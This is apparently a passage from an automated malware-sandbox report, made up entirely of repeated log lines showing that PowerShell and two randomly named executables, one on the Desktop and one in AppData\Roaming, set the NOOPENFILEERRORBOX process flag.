                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
